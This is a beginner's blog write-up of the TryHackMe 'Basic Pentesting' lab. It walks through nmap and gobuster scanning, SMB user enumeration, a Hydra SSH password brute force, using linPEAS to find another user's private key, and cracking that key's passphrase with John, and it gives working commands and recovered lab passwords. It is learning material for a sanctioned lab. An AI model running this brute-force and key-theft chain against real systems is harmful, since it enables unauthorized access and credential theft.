TryHackMe: Basic Pentesting

It’s my first challenge, lets do it! I’m following the video and pausing trying to solve my way.

Room Link

Ok, im stucked I dont know how to connect the attacker’s machine to the target’s machine Target’s IP: 10.10.126.255 Oh I don’t need to connect to the attacker’s machine yet, I just need to run nmap

root@ip-10-10-192-252:~/Desktop# nmap -sC -sV -oN nmap/initial 10.10.126.255

Ports open:

22
80
139
445
8009
8080

There’s a web site running on port 80, lets see whats there! Oh, how to access a web-site by the terminal? I’ve it noted somewhere, can’t find… maybe its wget? It’s not!! Should be curl (I wont seach on Internet, only using my notes.) Worked. ez.

root@ip-10-10-192-252:~/Desktop# curl 10.10.126.255
<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

(btw, wget worked followed by a cat, but i didnt want to download it)

Following the video, it says to use gobuster to bruteforce the directorys. Ok but I don’t have the wordlist…

Gobuster is an aggressive scan. Its noisy and is noticed. Only use against systems you have permissions to scan against

Ok I’ll need to Internet (Grok) now…GoBuster Tutorial WordList GUESS WHAT!? The THM machine already had a worldlist, I just looked around the CLI, changing directories… and found a lot of worldlists.

root@ip-10-10-192-252:~/Desktop/Tools/wordlists# ls
dirb       fasttrack.txt   PythonForPentesters  SecLists
dirbuster  MetasploitRoom  rockyou.txt

Found the same wordlist as used in the video…

directory-list-2.3-medium.txt

root@ip-10-10-192-252:~/Desktop# gobuster dir -w /root/Desktop/Tools/wordlists/SecLists//Discovery/Web-Content/directory-list-2.3-medium.txt -u 10.10.126.255
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 320] [--> http://10.10.126.255/development/]
/server-status        (Status: 403) [Size: 301]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished

Stucked on how to linux enumeration, clicked on Hint and got to use “SMB”, lets find it! Command not found. Internet time, found it: How to Enumerate SMB with Enum4linux & Smbclient Discovered some stuffs, SMB is a protocol and Unix systems use SMB through Samba! I saw Samba is running but didnt know what was that, now I have a clue! SMB usually works on ports: 139 and 445, we have both oppened!

“Enum4linux is a tool used to enumerate SMB shares on both Windows and Linux systems.”

root@ip-10-10-192-252:~/Desktop/Tools# enum4linux -U 10.10.126.255

Did not return useful information, so lets try:

root@ip-10-10-192-252:~/Desktop/Tools# enum4linux -a 10.10.126.255

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Here we go!

root@ip-10-10-192-252:~/Desktop/Tools# hydra -l jan -P /root/Desktop/Tools/wordlists/rockyou.txt ssh://10.10.126.255
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-07 18:00:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.126.255:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344222 to do in 1358:22h, 16 active
[STATUS] 133.00 tries/min, 399 tries in 00:03h, 14343999 to do in 1797:30h, 16 active
[22][ssh] host: 10.10.126.255   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found

jan:armando Now I logged in the ssh, used cd .. and access kay directory but access denied to cat the files. So I need to escalate privilege. https://github.com/Keartland/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/README.md

Oh, forget the THM machine doesnt have Internet connection, so I looked back at the folders and found: /root/Desktop/Additional Tools/PEAS/linPEAS/linpeas.sh Let’s follow the video and pass this file to Jan’s directory using scp. scp /root/Desktop/Additional Tools/PEAS/linPEAS/linpeas.sh jan@10.10.126.255:/dev/shm shm = shared memory

jan@basic2:/dev/shm$ chmod +x linpeas.sh jan@basic2:/dev/shm$ ./linpeas.sh | tee linlog.txt

less -r /dev/shm/linpeas.txt read with colors

Ok, the file doesnt look completed and I cant go up to see all the content. Actually the ‘cat linlog.txt’ may seen not working, some mad stuff happened! The Terminal got craaazzzzy after I tried to use less and cat and more to read the full file o.O :

Ok, I closed the terminal and started again: scp /root/Desktop/Additional\ Tools/PEAS/linPEAS/linpeas.sh jan@10.10.126.255:/dev/shm chmod +x linpeas.sh

With nano it oppened kind broken but oppened. Stucked for 30m+. Couldnt find the answer so… i’ll try to SSH via VPN

~Break of 2 hours

Yeah, with the VPN worked out! jan@basic2:/dev/shm$ ./linpeas_linux_amd64 | tee linlog.txt

══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa

Kay’s ssh were found, lets access it: at Kay’s home dir: ls -la cd .ssh cat id_rsa Saved id_rsa at an file on my computer chmod 600 kay_id_rsa └─$ ssh -i kay_id_rsa kay@10.10.103.97 Oh, SSH has a password! Lets find it out with John The Ripper On Kali Linux: john kay_id_rsa

F, used the wrong John! I need to use ssh2john

ssh2john kay_id_rsa > forjohn.txt └─$ john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt Found the password: beeswax (kay_id_rsa)

└─$ ssh -i kay_id_rsa kay@10.10.103.97 password: beeswax

now I have access to pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$

GG! Learned a lot, was really fun!

Tools used: Nmap Gobuster Eenum4linux Hydra John The Ripper